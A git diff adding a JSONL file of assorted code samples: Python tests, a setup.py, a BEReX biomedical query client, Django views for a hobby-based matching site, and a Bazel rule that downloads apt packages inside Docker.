diff --git "a/1690.jsonl" "b/1690.jsonl"
new file mode 100644
--- /dev/null
+++ "b/1690.jsonl"
@@ -0,0 +1,686 @@
+{"seq_id":"303341273","text":"from egogoger.virusmusic.pages.main_page import MainPage\nfrom egogoger.virusmusic.constants import BACKEND_ERROR\nfrom egogoger.base_test import Test\nfrom .open_reg_form import open_reg_form\nfrom egogoger.utils import set_input\n\n\nclass InvalidNameTest(Test):\n\tCYRILLIC_NAME = 'Вася'\n\tSHORT_NAME = '1'\n\tLONG_NAME = 'a' * 257\n\n\tdef test(self):\n\t\tmain_page = MainPage(self.driver)\n\t\tform = main_page.reg_form\n\t\topen_reg_form(self, main_page, form)\n\t\tform.clear_inputs()\n\n\t\t# Cyrillic name\n\t\tset_input(self.driver, form.NAME, self.CYRILLIC_NAME)\n\t\tform.submit()\n\t\tform.check_error_msg_for(form.NAME_ERROR, self, None)\n\t\tform.clear_inputs()\n\n\t\t# Short name\n\t\tset_input(self.driver, form.NAME, self.SHORT_NAME)\n\t\tform.submit()\n\t\tform.check_error_msg_for(form.NAME_ERROR, self, None)\n\t\tform.clear_inputs()\n\n\t\t# BACKEND checks\n\t\t## Long name\n\t\tform.set_correct_values()\n\t\tset_input(self.driver, form.NAME, self.LONG_NAME)\n\t\tform.submit()\n\t\tform.check_error_msg_for(form.BACKEND_ERROR, self, BACKEND_ERROR)\n\t\tform.clear_inputs()\n","sub_path":"egogoger/virusmusic/tests/invalid_name.py","file_name":"invalid_name.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"307742365","text":"#!python3\n\"\"\"\n##### Task 2\nCreate a function called largest.\nThe input is a list.\nThe return value is the largest value in the list\n(2 points)\n\"\"\"\n\ndef largest(numbers):\n numbers.sort()\n answer = numbers[-1]\n return answer\n\nx = largest([1,5,3])\nprint(x)\n","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"143727057","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='spiky',\n\n version='1.0.3',\n\n description='Spike sorting based on Gaussian Mixture Model',\n\n long_description=long_description,\n\n url='https://github.com/rodriguez-facundo/spiky',\n\n author='F. Rodriguez',\n\n author_email='frodriguez4600@gmail.com',\n\n classifiers=[ 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Medical Science Apps.',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n ],\n\n keywords='spike sorting',\n\n packages=['spiky'],\n\n install_requires=[ 'numpy',\n 'matplotlib',\n 'progressbar2',\n 'pywavelets',\n 'scipy',\n 'sklearn'\n ],\n\n extras_require={},\n\n package_data={},\n\n data_files=[],\n\n entry_points={},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"225195359","text":"from mhcgnomes import parse, Species, Allele, Haplotype, Gene\nfrom nose.tools import eq_\n\ndef test_parse_BF2_gene():\n result = parse(\"BF2\")\n expected = Gene.get(\"chicken\", \"BF2\")\n assert expected is not None\n eq_(result, expected)\n\ndef test_parse_BF2_15_01():\n result = parse(\"BF2*15:01\")\n chicken = Species.get(\"chicken\")\n expected = Allele.get(chicken, \"BF2\", \"15\", \"01\")\n eq_(result, expected)\n\ndef test_parse_BF2_1501():\n result = parse(\"BF2*1501\")\n expected = Allele.get(Species.get(\"chicken\"), \"BF2\", \"15\", \"01\")\n eq_(result, expected)\n\ndef test_chicken_haplotype_B12():\n result = parse(\"B12\", default_species=\"Gaga\")\n print(result)\n eq_(type(result), Haplotype)\n eq_(result.name, \"B12\")\n assert result.is_chicken\n\n\ndef test_chicken_haplotype_B19_class_II():\n result = parse(\"B19 Class II\")\n eq_(type(result), Haplotype)\n eq_(result.name, \"B19\")\n assert result.is_chicken\n assert result.is_class2\n\ndef test_chicken_haplotype_BF19_class_I():\n result = parse(\"BF19 Class I\")\n eq_(type(result), Haplotype)\n eq_(result.name, \"BF19\")\n assert result.is_chicken\n assert result.is_class1\n\ndef test_chicken_YF1w_7_1():\n result = parse(\"YF1w*7.1\")\n eq_(type(result), Allele)\n eq_(result.name, \"7.1\")\n eq_(result.gene_name, \"YF1\")\n assert result.is_chicken\n assert result.is_class1\n\ndef test_YF1w_in_gene_aliases():\n species = Species.get(\"chicken\")\n gene_names_and_aliases = species.gene_names_and_aliases\n assert \"YF1w\" in gene_names_and_aliases, gene_names_and_aliases\n","sub_path":"test/test_chicken.py","file_name":"test_chicken.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"570410859","text":"#-*-coding:utf8-*-\n#########################################################################\n# Copyright (C) 2018 All rights reserved.\n# \n# FileName:Align_corpus.py\n# Creator: yuliu1finally@gmail.com\n# Time:02/23/2018\n# Description:\n#\n# Updates:\n#\n#########################################################################\n#!/usr/bin/python\nfrom config import max_seq_len,min_seq_len,filling_symbol;\nif __name__==\"__main__\":\n label_copus_file_path=\"dataset/th2.corpus.txt\";\n align_copus_file_path=\"dataset/th2.corpus.align.txt\";\n with open(align_copus_file_path,\"w\") as align_copus_file:\n with open(label_copus_file_path,\"r\") as label_copus_file:\n for line in label_copus_file:\n line = line.strip();\n tag=line[:2];\n line=line[2:];\n uline=line.decode(\"UTF-8\");\n if len(uline)<min_seq_len or len(uline)>max_seq_len:\n continue;\n line+=filling_symbol*(max_seq_len-len(uline));\n 
align_copus_file.write(\"%s%s\\n\"%(tag,line));\n","sub_path":"Align_corpus.py","file_name":"Align_corpus.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"193577395","text":"\"\"\"\r\n.. module:: dmis.berex\r\n :platform: Unix, linux, Windows\r\n.. moduleauthor:: Minji Jeon \r\n\r\n=====================================\r\nBiomedical entity network query API\r\n=====================================\r\n\r\n.. note:: Usage: Biomedical entity network query API\r\n\r\n>>> from dmis import berex\r\n>>> \r\n>>> berexQuery = berex.BEReXQuery({\"keywordA\":[\"chronic myeloid leukemia\"], \"keywordB\":[\"ABL1\", \"imatinib\"], \"mode\":\"subnet\"})\r\n>>> relevantRelations = getRelevantBioRelations(berexQuery)\r\n>>> \r\n>>> print(relevantRelations)\r\n\r\n\r\n\"\"\"\r\n\r\nfrom functools import reduce\r\n\r\nimport json\r\nimport urllib.request\r\n\r\n#berex query object\r\nclass BEReXQuery():\r\n \"\"\"\r\n dmis.BEReXQuery class is basic query object for BEReX API.\r\n \r\n \"\"\"\r\n \r\n berexurl = \"http://berex.korea.ac.kr/api/\"\r\n \r\n #query has a mode\r\n #mode 1 is to get edges about query entities\r\n #mode 7 is to get enriched gene ontology\r\n \r\n def __init__(self, queryObj={\"keywordA\":[], \"keywordB\":[], \"mode\":1}):\r\n \"\"\"BEReXQuery\r\n \r\n :param queryObj: keywordA (list), keywordB (list), mode ([\"subnet\", \"GOTerms\"]) dict return.\r\n \r\n >>> query = BEReXQuery({\"keywordA\":[\"chronic myeloid leukemia\", \"BCR\"], \"keywordB\":[\"ABL1\", \"imatinib\"], \"mode\":\"subnet\"})\r\n \"\"\"\r\n \r\n if queryObj[\"keywordA\"] == None:\r\n queryObj[\"keywordA\"] = [\"\"]\r\n \r\n if len(queryObj[\"keywordA\"]) == 0:\r\n queryObj[\"keywordA\"] = [\"\"]\r\n \r\n if (\"keywordA\" not in queryObj) or (type(queryObj[\"keywordA\"]) is not list) or (\"keywordB\" not in queryObj) or(type(queryObj[\"keywordB\"]) is not list) or (\"mode\" not in queryObj):\r\n print (\"Initialize error: invalid query object, query object should contains 'keywordA (list of string)', 'keywordB (list of string)', 'mode (['subnet', 'GOTerms'])'\")\r\n print (queryObj)\r\n \r\n for keya in queryObj[\"keywordA\"] :\r\n if type(keya) is not str :\r\n print (\"Initialize error: invalid keywordA. keywordA should be either None, empty list or list of string\")\r\n print (queryObj[\"keywordA\"])\r\n \r\n for keyb in queryObj[\"keywordB\"] :\r\n if type(keyb) is not str :\r\n print (\"Initialize error: invalid keywordB. keywordB should be list of string\")\r\n print (queryObj[\"keywordB\"])\r\n \r\n if queryObj[\"mode\"] not in [\"subnet\", \"GOTerms\"] :\r\n print(\"Initialize error: invalid search mode. The search mode should be either 'subnet' or 'GOTerms'\")\r\n \r\n self.keywordA = queryObj[\"keywordA\"]\r\n self.keywordB = queryObj[\"keywordB\"]\r\n self.mode = queryObj[\"mode\"]\r\n \r\n def setKeywordA (self, keywords):\r\n \"\"\"Setting the primary keywords (Keyword A)\r\n \r\n :param keyword: primary keywords, which must be a list of str\r\n \r\n >>> query.setKeywordA([\"cancer\"])\r\n \"\"\"\r\n \r\n for keya in keywords :\r\n if type(keya) is not str :\r\n print (\"Initialize error : invalid keywordA. 
keywordA should be list of string\")\r\n print (keywords)\r\n return\r\n \r\n if len(keywords) == 0:\r\n keywords = [\"\"]\r\n return\r\n \r\n self.keywordA = keywords\r\n \r\n def getKeywordA (self):\r\n \"\"\"Getting the primary keyword (Keyword A)\r\n \r\n :return: keyword A list\r\n \r\n >>> keywordA = query.getKeywordA()\r\n >>> print (keywordA)\r\n ['chronic myeloid leukemia']\r\n \"\"\"\r\n return self.keywordA\r\n \r\n def addKeywordtoA (self, keyword):\r\n \"\"\"Adding a keyword to the primary keyword list (Keyword A)\r\n \r\n :param keyword: the keyword to be added to the primary keyword list\r\n \r\n >>> print (query.getKeywordA())\r\n ['chronic myeloid leukemia', 'BCR']\r\n >>> query.addKeywordtoA(\"EGFR\")\r\n >>> print (query.getKeywordA())\r\n ['chronic myeloid leukemia', 'BCR', \"EGFR']\r\n \"\"\"\r\n self.keywordA.append(keyword)\r\n \r\n def removeKeywordfromA(self, keyword):\r\n \"\"\"Removing a keyword from the primary keyword list (Keyword A)\r\n \r\n :param keyword: the keyword to be removed from the primary keyword list\r\n \r\n >>> print (query.getKeywordA())\r\n ['chronic myeloid leukemia', 'BCR', 'EGFR']\r\n >>> query.removeKeywordfromA(\"EGFR\")\r\n >>> print (query.getKeywordA())\r\n ['chronic myeloid leukemia', 'BCR']\r\n \"\"\"\r\n self.keywordA.remove(keyword)\r\n \r\n \r\n def setKeywordB (self, keywords):\r\n \"\"\"Setting the secondary keywords (Keyword B)\r\n \r\n :param keywords: the secondary keywords, which must be a list of str\r\n \r\n >>> keywordB = [\"ABL1\", \"imatinib\"]\r\n >>> query.setKeywordB(keywordB)\r\n \"\"\"\r\n for keyb in keywords :\r\n if type(keyb) is not str :\r\n print (\"Initialize error : invalid keywordB. keywordB should be list of string\")\r\n print (keywords)\r\n return\r\n \r\n if type(keywords) is list:\r\n self.keywordB = keywords\r\n else :\r\n print (\"Warning! 
keywords should be list type : \" + str(keywords))\r\n \r\n def isValid(self):\r\n if type(self.keywordA) is not list:\r\n return False\r\n \r\n for keya in self.keywordA :\r\n if type(keya) is not str :\r\n return False\r\n \r\n for keyb in self.keywordB :\r\n if type(keyb) is not str :\r\n return False\r\n \r\n if len(self.keywordB) == 0:\r\n return False\r\n \r\n #if self.mode != 1 and self.mode != 7:\r\n# return False\r\n\r\n if self.mode not in [\"subnet\", \"GOTerms\"]:\r\n return False\r\n \r\n return True\r\n \r\n def getKeywordB (self):\r\n \"\"\"Getting the secondary keywords (Keyword B)\r\n \r\n :return: list of keyword B string\r\n \r\n >>> keywordB = query.getKeywordB()\r\n >>> print (keywordB)\r\n ['ABL1', 'imatinib']\r\n \"\"\"\r\n return self.keywordB\r\n \r\n def addKeywordtoB (self, keyword):\r\n \"\"\"Adding a keyword to the secondary keyword list (Keyword B)\r\n \r\n :param keyword: the keyword to be added to the secondary keyword list\r\n \r\n >>> print (query.getKeywordB())\r\n ['ABL1', 'imatinib']\r\n >>> query.addKeywordtoB(\"EGFR\")\r\n >>> print (query.getKeywordB())\r\n ['ABL1', 'imatinib', 'EGFR']\r\n \"\"\"\r\n self.keywordB.append(keyword)\r\n \r\n def removeKeywordfromB(self, keyword):\r\n \"\"\"Removing a keyword from the secondary keyword list (Keyword B)\r\n \r\n :param keyword: the keyword to be removed from the secondary keyword list\r\n \r\n >>> print (query.getKeywordB())\r\n ['ABL1', 'imatinib', 'EGFR']\r\n >>> query.removeKeywordfromB(\"EGFR\")\r\n >>> print (query.getKeywordB())\r\n ['ABL1', 'imatinib']\r\n \"\"\"\r\n self.keywordB.remove(keyword)\r\n \r\n def setMode (self, mode):\r\n \"\"\" Setting a searching mode\r\n \r\n :param mode: searching mode. This should be either \"subnet\" or \"GOTerms\"\r\n \r\n >>> query.setMode(\"subnet\")\r\n \"\"\"\r\n self.mode = mode\r\n \r\n def getMode (self):\r\n \"\"\" Getting the searching mode\r\n \r\n :return: the searching mode\r\n \r\n >>> print (query.getMode())\r\n subnet\r\n \"\"\"\r\n return self.mode\r\n \r\n def makeQueryString(self): \r\n \r\n #paramKeywordA = self.keywordA\r\n paramKeywordA = reduce(lambda x, y: x +\"@@\" + y , self.keywordA)\r\n paramKeywordB = reduce(lambda x, y: x +\"@@\" + y , self.keywordB)\r\n queryKeywords = paramKeywordB\r\n \r\n if paramKeywordA != \"\":\r\n queryKeywords = queryKeywords + \"@@\" + paramKeywordA\r\n queryKeywords = queryKeywords.replace(\" \",\"%20\")\r\n \r\n mode = 1\r\n if self.mode == \"subnet\":\r\n mode = 1\r\n elif self.mode == \"GOTerms\" :\r\n mode = 7\r\n \r\n strQuery = self.berexurl +\"server.php?query=\" + queryKeywords +\"&mode=\" + str(mode)\r\n return strQuery\r\n \r\n#get raw data from berex\r\ndef getRelevantBioRelations(berexQuery):\r\n \"\"\" Function for retrieval from BOSS\r\n \r\n :param berexQuery: BEReXQuery\r\n \r\n :return: subnetwork object (mode \"subnet\") or list of enriched GO terms (mode \"GOTerms\")\r\n \r\n * subnetwork object (list): [BIO_EDGE]\r\n - BIO_EDGE: {\"source\":str, \"target\":str, \"dbsource\":str, \"interaction\":str, \"reference\":str}\r\n * list of GO terms (object): {\"biological process\":[str], \"molecular function\":[str], \"cellular component\":[str]}\r\n \r\n >>> berexQuery = BEReXQuery({\"keywordA\":[\"chronic myeloid leukemia\"], \"keywordB\":[\"ABL1\", \"imatinib\"], \"mode\":\"subnet\"})\r\n >>> relevantRelations = getRelevantBioRelations(bossQuery)\r\n \"\"\"\r\n if not (type(berexQuery) is BEReXQuery):\r\n print (\"query is invalid! 
please check your query object.\")\r\n \r\n if not berexQuery.isValid() :\r\n print (\"Query object is invalid. Please check the query\")\r\n print (\"Query: \")\r\n print (\" keywordA: \" + str(berexQuery.keywordA))\r\n print (\" keywordB: \" + str(berexQuery.keywordB))\r\n print (\" mode: \" + str(berexQuery.mode))\r\n \r\n return {}\r\n \r\n Query = berexQuery.makeQueryString()\r\n \r\n \r\n request = urllib.request.Request(Query)\r\n request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')\r\n \r\n Url = urllib.request.urlopen(request)\r\n \r\n print (Query)\r\n ResultStr = Url.read().decode('utf-8')\r\n \r\n \r\n if berexQuery.getMode() == \"subnet\":\r\n Result = makeDataFromBEReXQueryResult(ResultStr)\r\n elif berexQuery.getMode() == \"GOTerms\":\r\n Result = makeGODataFromBEReXQueryResult(ResultStr)\r\n return Result\r\n\r\n#make data for mode 1 (entity search mode)\r\n#resultDataArr is array containing each edge\r\n#get source node name : resultDataArr[i]['source']\r\n#edge contains source, target, dbsource, interaction,and reference\r\n\r\ndef makeDataFromBEReXQueryResult(resultStr): \r\n if resultStr == \"\":\r\n return None\r\n resultStr = resultStr.replace(\"\",\"\")\r\n resultStr = resultStr.replace(\"
\",\"\")\r\n resultObject = json.loads(resultStr, strict=False)\r\n edges = resultObject['data']['edges']\r\n \r\n linesCnt = len(edges)\r\n resultDataArr = []\r\n curData = {}\r\n for i in range(0, linesCnt) :\r\n edge = edges[i]\r\n \r\n curData={\"source\":edge['source'], \"target\":edge['target'], \"dbsource\":edge['dbsource'], \"interaction\":edge['interaction'],\"reference\":edge['reference']}\r\n resultDataArr.append(curData)\r\n \r\n return resultDataArr\r\n\r\n#make data for mode 7 (go term search mode)\r\n#There are three types of ontology, biological process, molecular function, cellular component\r\n#get biological process: resultData['biological process'] \r\ndef makeGODataFromBEReXQueryResult(resultStr): \r\n if resultStr == \"\":\r\n return None\r\n resultObject = json.loads(resultStr, strict=False)\r\n \r\n bplist = []\r\n mflist = []\r\n cclist = []\r\n \r\n for i in range(0, 3):\r\n if resultObject[i]['mode']==\"bp\":\r\n bplist = resultObject[i]['values']\r\n elif resultObject[i]['mode']==\"mf\":\r\n mflist = resultObject[i]['values']\r\n elif resultObject[i]['mode']==\"cc\":\r\n cclist = resultObject[i]['values']\r\n \r\n resultData = {\"biological process\":bplist, \"molecular function\":mflist, \"cellular component\":cclist}\r\n return resultData","sub_path":"BEST/dmis/berex.py","file_name":"berex.py","file_ext":"py","file_size_in_byte":11967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"258244752","text":"from django.shortcuts import render\nfrom django.utils import timezone\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect, JsonResponse\nfrom django.template import RequestContext, loader\nfrom matching.models import Member, Profile, Hobby\nfrom django.contrib.auth.hashers import make_password\nfrom django.db import IntegrityError\nfrom datetime import date, datetime\n\n# from mainapp.templatetags.extras import display_message\n\n# datetime library to get time for setting cookie\nimport datetime as D\nimport sys\n\nappname = 'MatchUp'\n# decorator that tests whether user is logged in\ndef loggedin(view):\n def mod_view(request):\n if 'username' in request.session:\n username = request.session['username']\n try: user = Member.objects.get(username=username)\n except Member.DoesNotExist: raise Http404('Member does not exist')\n return view(request, user)\n else:\n return render(request,'matching/not-logged-in.html',{})\n return mod_view\n\n# decorator that tests whether user is logged in for view with multiple arguments\ndef loggedinGET(view):\n def mod_view(request,gender,minage,maxage):\n if 'username' in request.session:\n username = request.session['username']\n try: user = Member.objects.get(username=username)\n except Member.DoesNotExist: raise Http404('Member does not exist')\n return view(request, user,gender,minage,maxage)\n else:\n return render(request,'matching/not-logged-in.html',{})\n return mod_view\n\ndef index(request):\n context = { 'appname': appname }\n return render(request,'matching/index.html',context)\n\ndef signup(request):\n hobbies = Hobby.objects.all()\n context = {\n 'appname': appname,\n 'hobbies': hobbies\n }\n return render(request,'matching/signup.html',context)\n\ndef register(request):\n\n if 'username' in request.POST and 'password' in request.POST and 'email' in request.POST and 'DOB' in request.POST:\n u = request.POST['username']\n e = request.POST['email']\n p = request.POST['password']\n d = request.POST['DOB']\n g = request.POST['gender']\n\n user = 
Member(username=u)\n user.set_password(p)\n user.email = e\n user.DOB = d\n user.gender = g.lower()\n try: user.save()\n except IntegrityError: raise Http404('Username '+u+' already taken: Usernames must be unique')\n except: raise Http404(\"Date must be in the format YYYY-MM-DD. (e.g. 1997-10-23)\")\n hobbies = Hobby.objects.all()\n for hobby in hobbies:\n if hobby.name in request.POST:\n user.hobbies.add(hobby)\n context = {\n 'appname' : appname,\n 'username' : u\n }\n return render(request,'matching/user-registered.html',context)\n\n else:\n raise Http404('POST data missing')\n\ndef login(request):\n if not ('username' in request.POST and 'password' in request.POST):\n context = { 'appname': appname }\n return render(request,'matching/login.html',context)\n else:\n username = request.POST['username']\n password = request.POST['password']\n try: member = Member.objects.get(username=username)\n except Member.DoesNotExist: raise Http404('User does not exist')\n if member.check_password(password):\n # remember user in session variable\n request.session['username'] = username\n request.session['password'] = password\n context = {\n 'appname': appname,\n 'username': username,\n 'loggedin': True\n }\n response = render(request, 'matching/login.html', context)\n # remember last login in cookie\n now = D.datetime.utcnow()\n max_age = 365 * 24 * 60 * 60 #one year\n delta = now + D.timedelta(seconds=max_age)\n format = \"%a, %d-%b-%Y %H:%M:%S GMT\"\n expires = D.datetime.strftime(delta, format)\n response.set_cookie('last_login',now,expires=expires)\n return response\n else:\n raise Http404('Wrong password')\n\n@loggedin\ndef logout(request, user):\n request.session.flush()\n context = { 'appname': appname }\n return render(request,'matching/logout.html', context)\n\n@loggedin\ndef likes(request,user):\n # list of people user likes\n likes = user.likes.all()\n\n # render response\n context = {\n 'appname': appname,\n 'username': user.username,\n 'likes': likes,\n 'loggedin': True\n }\n return render(request, 'matching/likes.html', context)\n\n@loggedin\ndef members(request, user):\n try:\n # like someone new\n if 'add' in request.GET:\n like_username = request.GET['add']\n like = Member.objects.get(username=like_username)\n user.likes.add(like)\n user.save()\n like.email_user(\"Someone liked you!\", \"You have been liked by \"+user.get_username())\n # unlike someone\n if 'remove' in request.GET:\n like_username = request.GET['remove']\n like = Member.objects.get(username=like_username)\n user.likes.remove(like)\n user.save()\n except Member.DoesNotExist:\n raise Http404('Member does not exist')\n # view user profile\n if 'view' in request.GET:\n return view_profile(request, request.GET['view'])\n\n else:\n # list of all other members\n members = Member.objects.exclude(username=user.username)\n # list of the user likes\n likes = user.likes.all()\n # render response\n context = {\n 'appname': appname,\n 'username': user.username,\n 'members': members,\n 'likes': likes,\n 'loggedin': True\n }\n return render(request, 'matching/members.html', context)\n\n# this function is only ever called from within the members view\ndef view_profile(request, view_username):\n username = request.session['username']\n greeting = \"Your\" if username == view_username else view_username + \"'s\"\n try: user = Member.objects.get(username=view_username)\n except Member.DoesNotExist: raise Http404('Member does not exist')\n context = {\n 'user': user,\n 'appname': appname,\n 'username': username,\n 
'view_user': view_username,\n 'greeting': greeting,\n 'profile': user.profile,\n 'hobbies': user.hobbies.all(),\n 'loggedin': True\n }\n return render(request, 'matching/member.html', context)\n\n@loggedin\ndef profile(request, user):\n # use this for debugging:\n # import pdb; pdb.set_trace()\n hobbies = Hobby.objects.all()\n userhobbies = user.hobbies.all()\n if request.method =='POST':\n if 'text' in request.POST:\n text = request.POST['text']\n if user.profile:\n user.profile.text = text\n user.profile.save()\n else:\n profile = Profile(text=text)\n profile.save()\n user.profile = profile\n user.save()\n hobbies = Hobby.objects.all()\n userhobbies = user.hobbies.all()\n for hobby in userhobbies:\n user.hobbies.remove(hobby)\n for hobby in hobbies:\n if hobby.name in request.POST:\n user.hobbies.add(hobby)\n user.save()\n context = {\n 'appname': appname,\n 'username': user.username,\n 'profile' : user.profile,\n 'userhobbies' : userhobbies,\n 'hobbies' : hobbies,\n 'loggedin': True\n }\n if request.method == 'POST':\n return HttpResponseRedirect(\"/members/?view=\"+user.username)\n return render(request, 'matching/profile.html', context)\n\n@loggedin\ndef matches(request, user):\n context={\n 'appname': appname,\n 'username': user.username,\n 'loggedin': True\n }\n return render(request, 'matching/matches.html', context)\n\n@loggedinGET\ndef get_matches(request, user, gender, minage, maxage):\n if request.is_ajax():\n matches =[]\n # all other members\n allmembers = Member.objects.exclude(username=user.username)\n # all of the users hobbies\n myhobbies = user.hobbies.all()\n # filter by gender if user has specified\n if gender!=\"any\":\n allmembers = allmembers.filter(gender=gender)\n #filter by minimum age if user has specified\n if minage!=\"-1\":\n current = datetime.now().date()\n min_date = date(current.year - int(minage), current.month, current.day)\n allmembers = allmembers.filter(DOB__lte=min_date)\n #filter by minimum age if user has specified\n if maxage!=\"-1\":\n current = datetime.now().date()\n max_date = date(current.year - int(maxage), current.month, current.day)\n allmembers = allmembers.filter(DOB__gte=max_date)\n\n # for every other member count how many hobbies they have in common and store in a dictionary\n for member in allmembers:\n count = 0\n theirhobbies = member.hobbies.all()\n commonhobbies = []\n for mh in myhobbies:\n for th in theirhobbies:\n if mh == th:\n count+=1\n commonhobbies.append(mh.name)\n temp = {'member': member.username,'commonhobbies': commonhobbies,'age': calculate_age(member.DOB), 'count': count, 'gender':member.gender}\n matches.append(temp)\n #sort other members based on highest number of common hobbies\n matches.sort(key = lambda tup: -tup['count'])\n\n return JsonResponse(matches, safe=False)\n else:\n return HttpResponse(\"err idk\")\n\n# function to calculate a persons age given their date of birth\ndef calculate_age(born):\n today = date.today()\n return today.year - born.year - ((today.month, today.day) < (born.month, born.day))\n\n@loggedin\ndef upload_image(request, user):\n if 'img_file' in request.FILES:\n image_file = request.FILES['img_file']\n if not user.profile:\n # if user doesn't have a profile yet\n # need to create a profile first\n profile = Profile(text='')\n profile.save()\n user.profile = profile\n user.save()\n user.profile.image = image_file\n user.profile.save()\n return HttpResponse(user.profile.image.url)\n else:\n raise Http404('Image file not 
received')\n","sub_path":"matching/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"569624171","text":"#Copyright 2017 Google Inc. All rights reserved.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Rule for downloading apt packages and tar them in a .tar file.\"\"\"\n\nload(\"//package_managers/apt_get:repos.bzl\", \"generate_additional_repos\")\nload(\"@io_bazel_rules_docker//docker:docker.bzl\", \"docker_build\")\n\ndef _generate_download_commands(ctx):\n return \"\"\"#!/bin/bash\nset -ex\n# Fetch Index\n# Remove /var/lib/apt/lists/* in the base image. apt-get update -y command will create them.\nrm -rf /var/lib/apt/lists/*\napt-get update -y\n# Make partial dir\nmkdir -p /tmp/install/./partial\n# Install command\napt-get install --no-install-recommends -y -q -o Dir::Cache=\"/tmp/install\" -o Dir::Cache::archives=\".\" {packages} --download-only\n# Tar command to only include all the *.deb files and ignore other directories placed in the cache dir.\ntar -cpf {output}.tar --directory /tmp/install/. `cd /tmp/install/. && ls *.deb`\"\"\".format(\n output=ctx.attr.name,\n packages=' '.join(ctx.attr.packages))\n\ndef _run_download_script(ctx, output, build_contents):\n contents = build_contents.replace(ctx.file.image_tar.short_path, ctx.file.image_tar.path)\n contents = contents.replace(ctx.outputs.pkg_tar.short_path, ctx.outputs.pkg_tar.path)\n # The paths for running within bazel build are different and hence replace short_path\n # by full path\n ctx.actions.write(\n output = ctx.outputs.build_script,\n content = contents,\n )\n\n ctx.actions.run(\n outputs = [ctx.outputs.pkg_tar],\n executable = ctx.outputs.build_script,\n inputs = [ctx.file.image_tar],\n )\n\ndef _impl(ctx):\n # docker_build rules always generate an image named 'bazel/$package:$name'.\n builder_image_name = \"bazel/%s:%s\" % (ctx.attr.image_tar.label.package,\n ctx.attr.image_tar.label.name.split(\".tar\")[0])\n\n # Generate a shell script to run apt_get inside this docker image.\n # TODO(tejaldesai): Replace this by docker_run rule\n build_contents = \"\"\"\\\n#!/bin/bash\nset -ex\ndocker load --input {image_tar}\n# Run the builder image.\ncid=$(docker run -w=\"/\" -d --privileged {image_name} sh -c $'{download_commands}')\ndocker attach $cid\ndocker cp $cid:{installables}.tar {output}\n# Cleanup\ndocker rm $cid\n \"\"\".format(image_tar=ctx.file.image_tar.short_path,\n image_name=builder_image_name,\n installables=ctx.attr.name,\n download_commands=_generate_download_commands(ctx),\n output=ctx.outputs.pkg_tar.short_path,\n )\n _run_download_script(ctx, ctx.outputs.pkg_tar, build_contents)\n ctx.actions.write(\n output = ctx.outputs.executable,\n content = build_contents,\n )\n return struct(\n runfiles = ctx.runfiles(files = [ctx.file.image_tar, ctx.outputs.build_script]),\n files = depset([ctx.outputs.executable])\n )\n\n_download_pkgs = rule(\n attrs = {\n \"image_tar\": 
attr.label(\n default = Label(\"//ubuntu:ubuntu_16_0_4_vanilla.tar\"),\n allow_files = True,\n single_file = True,\n ),\n \"packages\": attr.string_list(\n mandatory = True,\n ),\n },\n executable = True,\n outputs = {\n \"pkg_tar\": \"%{name}.tar\",\n \"build_script\": \"%{name}.sh\",\n },\n implementation = _impl,\n)\n\n\"\"\"Downloads packages within a container\n\nThis rule creates a script to download packages within a container.\nIt also runs the script and produces the tarball if requested.\nThe script bundles all the packages in a tarball.\n\nArgs:\n name: A unique name for this rule.\n image_tar: The image tar for the container used to download packages.\n packages: list of packages to download. e.g. ['curl', 'netbase']\n\"\"\"\n\ndef download_pkgs(name, image_tar, packages, additional_repos=[]):\n \"\"\"Downloads packages within a container\n This rule creates a script to download packages within a container.\n The script bundles all the packages in a tarball.\n Args:\n name: A unique name for this rule.\n image_tar: The image tar for the container used to download packages.\n packages: list of packages to download. e.g. ['curl', 'netbase']\n additional_repos: list of additional debian package repos to use, in sources.list format\n \"\"\"\n tars = []\n if additional_repos:\n repo_name=\"{0}_repos\".format(name)\n generate_additional_repos(\n name = repo_name,\n repos = additional_repos\n )\n tars.append(\"%s.tar\" % repo_name)\n\n\n img_target_name = \"{0}_build\".format(name)\n docker_build(\n name = img_target_name,\n base = image_tar,\n tars = tars,\n )\n _download_pkgs(\n name = \"{0}\".format(name),\n image_tar = \":{0}.tar\".format(img_target_name),\n packages = packages,\n )\n","sub_path":"package_managers/download_pkgs.bzl","file_name":"download_pkgs.bzl","file_ext":"bzl","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
